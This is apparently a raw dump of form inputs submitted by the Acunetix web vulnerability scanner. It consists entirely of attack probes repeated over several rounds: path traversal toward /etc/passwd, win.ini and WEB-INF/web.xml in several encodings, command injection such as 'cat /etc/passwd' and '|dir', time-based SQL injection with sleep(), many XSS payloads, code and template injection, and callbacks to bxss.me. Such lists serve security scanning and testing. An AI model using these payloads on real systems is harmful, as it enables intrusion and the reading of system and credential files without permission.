..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

http://hit9pKz6cFh2C.bxss.me/

1<input autofocus onfocus=prompt(916204)>

1

'&dir&'

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

comments

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

comments

1

UA5lBGD3'

1

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

dnvNbvHB')

1

comments/.

1

1

1

'"

Gq0vi1HE'))

1_PYNxy <ScRiPt >prompt(921390)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

|dir

1

1

1'"()&%<ScRiPt >prompt(946701)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(972453)</ScRiPt>

1

1

'|dir

1

WEB-INF\web.xml

1

1

1_951055

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

acu3616\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3616

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux1744\xc0\xbez1\xc0\xbcz2a\x90bcxuca1744

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(937478)</ScRiPt>

1

1

1<script>prompt(911778)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(984289)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952035></ScRiPt>

response.write(9801363*9492981)

1

1

'+response.write(9801363*9492981)+'

1<ScRiPt >prompt(986411)</ScRiPt>

1

1

1

"+response.write(9801363*9492981)+"

1<video><source onerror="javascript:prompt(978439)">

1

WEB-INF/web.xml

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959300)"></g></svg>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(959804))>

1

1

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<body onload=prompt(979100)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

${99003+100256}

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969774)>

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(957773)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1&n916366=v997328

1

1<img/src=">" onerror=alert(907477)>

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1<ScRiPt%20>prompt(989769)</sCripT>

1

1

1

"|"ld

-1))

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

n29wn6l6'

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(927586) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

!(()&&!|*|*|

VXjfFpVK')

'

'

1

1

1

1<input autofocus onfocus=prompt(930816)>

11tWQAdu'))

^(#$!@#$)(()))******

1

/etc/passwd

"

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

http://hitpHAMJKaaHB.bxss.me/

-1)

1

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1_UVYDW <ScRiPt >prompt(982974)</ScRiPt>

comments

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

hY1Bf2Hp'

'&dir&'

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

comments/.

"&dir&"

1

nH2NUphe')

'"

1

file:///etc/passwd

1

1

1

<!--

ZV3RmfGP'))

|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(981479)</ScRiPt>

1

1

'|dir

1

1

1

'"()&%<ScRiPt >prompt(999972)</ScRiPt>

1

WEB-INF/web.xml

"|dir

1

1

1_949469

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acu2021\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2021

1

................windowswin.ini

1

1

acux10547\xc0\xbez1\xc0\xbcz2a\x90bcxuca10547

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(986289)</ScRiPt>

1

1

1

response.write(9251607*9985971)

1

1<script>prompt(991670)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9251607*9985971)+'

1

1<ScRiPt >prompt(975661)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

"+response.write(9251607*9985971)+"

&cat /etc/passwd&

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941977></ScRiPt>

1

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(933100)</ScRiPt>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(930671)">

1

-1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

${99886+100077}

-1)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963587)"></g></svg>

1

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

|cat /etc/passwd#

1

1<div style=width:expression(prompt(954226))>

1

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1

ptRNl80z'

1&n936327=v956996

1

1

)

1<iframe src='data:text/html

1some_inexistent_file_with_long_name%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

2nfBuyHm')

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<body onload=prompt(962212)>

1

!(()&&!|*|*|

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

3L3inJW9'))

1

1

^(#$!@#$)(()))******

'"()

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957365)>

1

'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

'

1

"

1

1<img src=xyz OnErRor=prompt(918743)>

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1<img/src=">" onerror=alert(975477)>

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

/etc/passwd

1

1

&dir

http://hitOIq4gUCHrI.bxss.me/

1<ScRiPt%20>prompt(929197)</sCripT>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

psuohtOs'

acunetix_wvs_invalid_filename

'&dir&'

1&lt

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

Y9vX8a3O')

1

http://www.acunetix.tst

\xf6<img acu onmouseover=prompt(933167) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

'"

1

"&dir&"

1

M2EYSPXT'))

1

1<input autofocus onfocus=prompt(951111)>

1'"()&%<ScRiPt >prompt(937092)</ScRiPt>

1

<!--

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1

aThYRSIs'))

|dir

1

1

'"()&%<ScRiPt >prompt(960236)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'|dir

1

file:///etc/passwd

1_991440

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1_jVfTJ <ScRiPt >prompt(984291)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1

acu1201\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1201

1

1

acux3364\xc0\xbez1\xc0\xbcz2a\x90bcxuca3364

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(905258)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(941365)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(907519)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903432></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(952820)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(964897)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957129)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9916094*9404625)

1

1

1<div style=width:expression(prompt(918355))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

&cat /etc/passwd&

'+response.write(9916094*9404625)+'

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(917352)>

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9916094*9404625)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942934)>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(935430)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(942467)>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(977436)</sCripT>

${99062+99469}

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1&n915293=v919256

1&lt

1

1

1some_inexistent_file_with_long_name%00.jpg

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

\xf6<img acu onmouseover=prompt(966106) //\xf6>

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

UessGq3a'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(940665)>

'"()

1

'

1

testasp.vulnweb.com

'

/etc/passwd

kTVNmbSw')

^(#$!@#$)(()))******

1

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

YQZEnAOr'))

"

acunetix_wvs_invalid_filename

1

1

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

http://hitWX0X2ca2XU.bxss.me/

comments

-1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1_bHrXv <ScRiPt >prompt(929572)</ScRiPt>

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

1

1

1

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

http://www.acunetix.tst

"&dir&"

1

1

1

4fH8cFk4'

1

1

file:///etc/passwd

1

1

'"

|dir

1

ZWrtqfvf')

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(991678)</ScRiPt>

1

1

1

'|dir

cdWDIrB6'))

<!--

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(900111)</ScRiPt>

"|dir

1

1

1

1

1_905717

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu8142\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8142

1

1

1

................windowswin.ini

acux7182\xc0\xbez1\xc0\xbcz2a\x90bcxuca7182

1

1

1<ScRiPt >prompt(994022)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(921644)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(908199)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951996></ScRiPt>

1

1

1<ScRiPt >prompt(909814)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(932477)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993680)"></g></svg>

1

WEB-INF/web.xml

1

1

1

1<div style=width:expression(prompt(927417))>

1

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

1

1

1

1

1<body onload=prompt(972617)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983441)>

1

1<img src=xyz OnErRor=prompt(919567)>

1

1<img/src=">" onerror=alert(944372)>

1

1<ScRiPt%20>prompt(981878)</sCripT>

1&lt

1

\xf6<img acu onmouseover=prompt(938100) //\xf6>

1

1<input autofocus onfocus=prompt(943943)>

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_7rSQ0 <ScRiPt >prompt(921298)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9747209*9468489)

'+response.write(9747209*9468489)+'

1

"+response.write(9747209*9468489)+"

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

|cat /etc/passwd#

${100016+100204}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1&n932209=v923237

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

)

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

cnu9DSLK'

1

"

1

1

'

IVIXok6f')

/etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

y0I04NGU'))

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

http://hitqhonBeZduv.bxss.me/

||cat /etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

comments

&dir

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

http://www.acunetix.tst

'&dir&'

-1))

1

comments/.

'"

"&dir&"

1'"()&%<ScRiPt >prompt(998624)</ScRiPt>

1

byuSTWZt'

1

file:///etc/passwd

1

<!--

1

e52deq8v')

|dir

'"()&%<ScRiPt >prompt(910198)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1_909248

vGXLgogB'))

WEB-INF/web.xml

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

acu8246\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8246

1

acux10622\xc0\xbez1\xc0\xbcz2a\x90bcxuca10622

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(916688)</ScRiPt>

1

1<script>prompt(929402)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9640909*9504158)

1

1<ScRiPt >prompt(938162)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988843></ScRiPt>

'+response.write(9640909*9504158)+'

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(977645)</ScRiPt>

'&cat /etc/passwd&'

1

"+response.write(9640909*9504158)+"

1<video><source onerror="javascript:prompt(909517)">

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987488)"></g></svg>

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<div style=width:expression(prompt(916693))>

WEB-INF\web.xml

1

-1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<iframe src='data:text/html

-1)

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

${99190+99145}

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<body onload=prompt(970578)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

'|'ld

bbDZxyyr'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961730)>

1some_inexistent_file_with_long_name%00.jpg

"|"ld

8AEAl3bJ')

1

)

1&n948973=v924228

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=xyz OnErRor=prompt(925256)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

Wz2i4vBy'))

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img/src=">" onerror=alert(950261)>

testasp.vulnweb.com

1

-1

^(#$!@#$)(()))******

'"()

1

/etc/passwd

1<ScRiPt%20>prompt(957418)</sCripT>

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1)

1

1&lt

1

1

||cat /etc/passwd

1

-1))

1

"

1

&dir

http://hitD744aOjUh6.bxss.me/

1

\xf6<img acu onmouseover=prompt(949406) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

DI2KUbgd'

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1

'&dir&'

dFt2ULde')

1<input autofocus onfocus=prompt(976657)>

1

1

comments

"&dir&"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Zo3oaawI'))

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

http://www.acunetix.tst

|dir

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'|dir

[url=http://www.acunetix.com]website security[/url]

1

comments/.

1

'"

1

1'"()&%<ScRiPt >prompt(968444)</ScRiPt>

1

1_AW21c <ScRiPt >prompt(957107)</ScRiPt>

"|dir

file:///etc/passwd

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(985416)</ScRiPt>

1

1

1

1

1

1_904333

WEB-INF/web.xml

1

1

1

1

1

1

1

1

WEB-INF\web.xml

1

1

1

acu6214\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6214

1

../../../../../../../../../../windows/win.ini

1

1

acux10971\xc0\xbez1\xc0\xbcz2a\x90bcxuca10971

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(961976)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(910646)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(914451)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993316></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(943473)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(920082)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933054)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(974393))>

response.write(9560348*9798351)

1

1

1

&cat /etc/passwd&

'+response.write(9560348*9798351)+'

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

1

"+response.write(9560348*9798351)+"

1

1<body onload=prompt(919684)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(16.875999999999997),0)/*'XOR(if(now()=sysdate(),sleep(16.875999999999997),0))OR'"XOR(if(now()=sysdate(),sleep(16.875999999999997),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965743)>

1

1

1

1

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(981210)>

(select(0)from(select(sleep(16.875999999999997)))v)/*'+(select(0)from(select(sleep(16.875999999999997)))v)+'"+(select(0)from(select(sleep(16.875999999999997)))v)+"*/

1

1

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1

1

1

-1

1<img/src=">" onerror=alert(940538)>

${100196+100235}

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(970237)</sCripT>

-1)

1&n907307=v984858

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

)

1

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

-1))

../../../../../../../../../../etc/passwd.jpg

"|"ld

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(994470) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

jUkS0Xv2'

'"()

1<input autofocus onfocus=prompt(991518)>

1

1

testasp.vulnweb.com

'

<a href='http://www.acunetix.com'>website security</a>

1

'

